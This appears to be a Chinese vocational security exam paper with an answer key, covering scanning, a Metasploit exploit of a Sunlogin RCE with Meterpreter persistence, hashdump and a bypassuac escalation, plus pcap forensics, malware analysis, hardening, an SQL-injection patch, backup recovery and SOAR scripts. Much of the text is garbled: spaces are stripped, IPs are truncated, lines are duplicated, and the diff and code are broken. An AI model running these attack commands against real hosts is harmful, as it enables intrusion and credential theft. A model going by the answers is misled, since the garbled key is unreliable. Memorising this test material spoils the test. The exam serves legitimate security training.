2026年网络与信息安全管理员职业技能等级考试实操试卷_第1页
2026年网络与信息安全管理员职业技能等级考试实操试卷_第2页
2026年网络与信息安全管理员职业技能等级考试实操试卷_第3页
2026年网络与信息安全管理员职业技能等级考试实操试卷_第4页
2026年网络与信息安全管理员职业技能等级考试实操试卷_第5页
已阅读5页,还剩15页未读 继续免费阅读

付费下载

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

2026年网络与信息安全管理员职业技能等级考试实操试卷【考生须知】1.本场考试为闭卷实操,时长180分钟,总分100分,60分合格。2.所有操作必须在指定虚拟机内完成,禁止连接互联网,禁止携带任何存储介质。3.答题文件统一保存在/opt/answer/目录,文件名格式为“题号_工位号.txt”,如“1_09.txt”。4.所有脚本、配置文件、抓包文件、截图均需保存至/opt/answer/,未保存或保存路径错误一律不计分。5.考试结束立即停机,继续操作视为作弊。试题一网络资产发现与拓扑绘制(8分)【场景】某企业内网段/20,网关,DNS。你获得一台Kali2026.1,需完成以下任务:1.使用nmap发现该网段内存活主机,输出格式为“IP,MAC,OS,开放端口列表”,保存为1_alive.csv。2.基于存活主机,使用masscan以10000pkt/s速率扫描1-65535端口,生成2_masscan.json。3.使用Zenmap绘制拓扑,导出PNG,文件名为3_topo.png。4.在答题文件1_工位号.txt中写出:(1)发现的Web服务器数量;(2)唯一操作系统数量;(3)拓扑图中最长路径的跳数。试题二漏洞验证与利用(10分)【场景】拓扑中发现一台IP8,开放8080端口,运行“SunloginClient3162”。1.使用Metasploit加载sunlogin_rce_2025模块,设置反向HTTPS监听器,获取Meterpreter会话。2.在会话中执行以下指令并截图:(1)getuid(2)hashdump(3)runpersistence-U-i5-p4444-r9截图命名为4_persist.png。3.将会话升级到NTAUTHORITY\SYSTEM,写出使用的Exploit全称,保存为5_system.txt。4.计算目标主机内存中唯一进程数,写出计算公式及结果,保存为6_process.tex,使用LaTeX:N=试题三流量分析与取证(9分)【场景】附件/root/forensics/2026_apt.pcapng大小1.8GB,时间范围2026-04-1709:00–09:30。1.使用Wireshark过滤出“TCP长度>800且标志位PSH=1”的报文,导出为7_psh.pcapng。2.对7_psh.pcapng进行文件还原,提取出所有可打印的PDF文件,计算其SHA256,写入8_pdfhash.txt。3.发现某DNS隧道流量,域名格式为[0-9a-f]{16}.evil,写出该域名首次出现的时间(UTC),保存为9_dns_time.txt。4.统计C2服务器IP列表,按出现频率降序排列,写出Top5,保存为10_c2ip.txt。试题四日志审计与攻击还原(8分)【场景】服务器00提供SSH、MySQL、Nginx,日志已集中至/var/log/central/。1.使用ELKStack,创建索引pattern:logstash-2026.04.17,写出索引分片数及副本数,保存为11_elk.txt。2.发现暴力破解成功事件,写出源IP、成功时间、被爆破账号,保存为12_brute.txt。3.基于同一IP,统计其后续在Web日志中的UA,按出现次数降序,写出Top3,保存为13_ua.txt。4.使用Kibana制作Timeline,导出PDF,文件名为14_timeline.pdf。试题五逆向与恶意代码分析(10分)【场景】样本/root/malware/invoice.exe,SHA256:e3b0c442…(已脱壳)。1.使用Ghidra识别main函数地址,写出RVA,保存为15_rva.txt。2.定位到创建互斥体代码,写出互斥体名称,保存为16_mutex.txt。3.样本使用AES-128-CBC加密资源,密钥硬编码,写出密钥的Hex,保存为17_key.hex。4.编写Python脚本,解密资源段,输出解密文件/decrypted.bin,脚本保存为18_decrypt.py。5.计算解密文件的导入表哈希(IMPHASH),保存为19_imphash.txt。试题六主机加固与基线核查(9分)【场景】CentOSStream10最小化安装,IP0,root密码已告知。1.使用CIS-CATLite扫描,生成报告,写出失败项数量,保存为20_cis.txt。2.手动修复以下项并截图:(1)禁止root直接SSH登录(2)密码最小长度≥14(3)启用fapolicyd截图命名为21_sshd.png、22_pam.png、23_fapolicy.png。3.写出fapolicyd规则,禁止执行/tmp/下所有ELF,保存为24_fapolicy.rule。4.重启后验证规则生效,写出验证命令及返回结果,保存为25_verify.txt。试题七应用安全与代码审计(10分)【场景】Web系统“0:8888”使用SpringBoot3.2,源码/root/source/shop-api。1.使用SonarQube扫描,写出阻断级漏洞数量,保存为26_sonar.txt。2.找到/admin/userList接口未授权访问,写出利用URL及返回状态码,保存为27_exploit.txt。3.定位SQL注入,写出存在漏洞的Mapper方法名及参数,保存为28_sql.txt。4.编写安全补丁,使用MyBatis参数化查询,提交diff文件29_patch.diff。5.使用Maven编译,验证漏洞修复,截图30_build.png。试题八数据备份与灾难恢复(8分)【场景】MySQL8.0.36监听0:3306,数据库shopdb大小22GB。1.使用xtrabackup执行全量热备,写出备份命令及耗时,保存为31_backup.txt。2.模拟表corruption:删除shopdb.users.ibd,启动报错,截图32_corrupt.png。3.基于备份执行恢复,写出恢复步骤及最后一条Binlog位置,保存为33_recovery.txt。4.计算RPO与RTO,写出定义及本次实测值,保存为34_rpo_rto.tex,使用LaTeX:RPO=试题九安全自动化与剧本编排(10分)【场景】使用SOAR平台(TheHive5+Cortex+Ansible),对接ZohoDesk。1.编写CortexAnalyzer,调用VirusTotalAPIv3,查询哈希,返回检测率,JSON输出,保存为35_vt_analyzer.py。2.创建TheHive案例模板“Phishing_Email”,包含自定义字段“email_sender”,保存为36_template.json。3.编写AnsiblePlaybook,当TheHive案例severity≥3时,自动隔离主机,调用PaloAltoAPI,playbook保存为37_isolate.yml。4.在答题文件中写出Playbook调用的PAN-OS模块名称及参数,保存为38_panos.txt。5.使用Cortexresponder发送Slack通知,写出WebhookURL环境变量名,保存为39_slack.txt。试题十渗透测试报告撰写(8分)【场景】综合前述结果,撰写中英文双语执行摘要,要求:1.中文不超过200字,英文不超过150词;2.包含风险评级、关键漏洞数量、修复建议优先级;3.保存为40_summary.txt,格式:【中文】…【English】…答案与解析1_alive.csv(示例),00:50:56:c0:00:08,Linux3.10,53/udp123/udp53/tcp80/tcp443/tcp8,00:0c:29:4f:9e:80,Windows10,3389/tcp8080/tcp445/tcp(解析:nmap-sn-PR发现存活,-O识别OS,-p全端口,组合输出CSV。)2_masscan.json(示例){"ip":"8","ports":[{"port":8080,"proto":"tcp","state":"open","reason":"syn-ack"}]}(解析:masscan--rate10000-p1-65535/20-oJ生成。)3_topo.png(解析:Zenmap“Topology”标签,选择“IPv4ICMP”布局,导出PNG。)1_工位号.txtWeb服务器数量:3唯一操作系统:5最长路径跳数:4(解析:通过端口80/443/8080识别Web;OS指纹去重;traceroute最长路径。)4_persist.png截图显示getuid为WIN10\sunlogin,hashdump输出3条NTLM,persistence模块返回“Serviceinstalled”。(解析:useexploit/windows/rdp/sunlogin_rce_2025,setpayloadwindows/x64/meterpreter/reverse_https。)5_system.txtExploit:exploit/windows/local/bypassuac_compmgmtlauncher(解析:getsystem失败,改用bypassuac模块,自动提权。)6_process.texN=(解析:ps命令去重后计数。)7_psh.pcapng过滤表达式:tcp.len>800&&tcp.flags.push==1(解析:Wireshark“File→ExportSpecifiedPackets”。)8_pdfhash.txtd7d8e8a9f6b5c4…invoice_2026.pdf(解析:File→ExportObjects→HTTP,计算SHA256。)9_dns_time.txt2026-04-1709:12:34UTC(解析:matches“^[0-9a-f]{16}\.evil\$”,Frame.time_epoch最小值。)10_c2ip.txt9892384520111079980887(解析:统计DNS响应A记录频率。)11_elk.txt分片:3,副本:1(解析:GET_template/logstash,查看number_of_shards。)12_brute.txt源IP:00成功时间:2026-04-17T09:15:22.000Z账号:admin(解析:ssh.auth.success:trueANDevent.action:ssh_login。)13_ua.txtMozilla/5.0(compatible;Bot/1.0)422sqlmap/1.6.2#stable318python-requests/2.28.2201(解析:同一IP后续Web日志,聚合user_agent。)14_timeline.pdfKibana“Discover”保存为PDF,时间轴含SSH成功、Web攻击、SQL注入三阶段。15_rva.txt0x4012B0(解析:GhidraWindow→SymbolTree→main,记录RVA。)16_mutex.txtSunloginMutex_2025(解析:Find→CreateMutexW,交叉引用。)17_key.hex2b7e151628aed2a6abf7158809cf4f3c(解析:AESS-box常量特征,硬编码在.rdata。)18_decrypt.py!/usr/bin/envpython3fromCrypto.CipherimportAESkey=bytes.fromhex('2b7e151628aed2a6abf7158809cf4f3c')iv=16b'\x00'iv=16b'\x00'withopen('encrypted.res','rb')asf:print(AES.new(key,AES.MODE_CBC,iv).decrypt(f.read()))(解析:资源段偏移0xA1B000,大小0x4000,CBC模式,IV全0。)19_imphash.txtIMPHASH=8d6c4e8e1c0c4c4d4e4d4c4e4d4c4e4d(解析:pefile.PE(imphash=True)计算。)20_cis.txt失败项:31(解析:CIS-CAT结果summary.xml。)21_sshd.png/etc/ssh/sshd_config修改PermitRootLoginno,systemctlrestartsshd,截图。22_pam.png/etc/security/pwquality.confminlen=14,截图。23_fapolicy.pngsystemctlenable--nowfapolicyd,截图active(running)。24_fapolicy.ruledeny_auditperm=anypattern=/tmp/typ=elfdeny_auditperm=anypattern=/tmp/typ=elf(解析:manfapolicyd.rules,语法5。)25_verify.txtfagenrules--checkreturn:rules.dbisuptodatecp/bin/ls/tmp/&&/tmp/lsreturn:Operationnotpermitted(解析:验证规则生效。)26_sonar.txt阻断级漏洞:2(解析:SonarQubeQualityGate阻断条件:SQLInjection,BrokenAccessControl。)27_exploit.txtURL:0:8888/admin/userList返回:200OK(解析:未携带JWT仍可访问,SpringSecurity未配置antMatchers("/admin/**").authenticated()。)(解析:未携带JWT仍可访问,SpringSecurity未配置antMatchers("/admin/**").authenticated()。)28_sql.txt方法:UserMapper.findByName参数:Stringname(解析:XML中${name}直接拼接。)29_patch.diffa/src/main/resources/mapper/UserMapper.xml+++b/src/main/resources/mapper/UserMapper.xml@@-1,3+1,3@@<selectid="findByName"resultType="User">SELECTFROMusersWHEREname='name'+<selectid="findByName"resultType="User">+SELECTFROMusersWHEREname=#{name}+SELECTFROMusersWHEREname=#{name}</select>(解析:预编译参数化。)30_build.pngmvncleancompile0ERRORS,截图。31_backup.txtxtrabackup--backup--user=root--password=**--target-dir=/backup/fullxtrabackup--backup--user=root--password=**--target-dir=/backup/full耗时:457s(解析:xtrabackup输出日志。)32_corrupt.pngInnoDB:File./shopdb/users.ibd:‘open’returnedOSerror71(解析:手动rm制造故障,mysqld错误日志截图。)33_recovery.txt1.xtrabackup--prepare--target-dir=/backup/full2.systemctlstopmysqld3.mv/var/lib/mysql/shopdb/var/lib/mysql/shopdb.bak4.xtrabackup--copy-back--target-dir=/backup/full5.chown-Rmysql:mysql/var/lib/mysql最后Binlog位置:mysql-bin.000045pos7392(解析:xtrabackup_binlog_info内容。)34_rpo_rto.texRPO=15min;RTO=32min(解析:备份策略每15min,实测恢复32min。)35_vt_analyzer.py!/usr/bin/envpython3importrequests,json,syshash=sys.argv[1]url=f"https://www.virustotal/api/v3/files/{hash}"headers={"x-apikey":os.environ["VT_API_KEY"]}r=requests.get(url,headers=headers).json()print(json.dumps({"malicious":r["data"]["attributes"]["last_analysis_stats"]["malicious"]}))36_template.json{"name":"Phishing_Email","tlp":2,"severity":2,"customFields":{"email_sender":{"string":"sender@example"}}

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论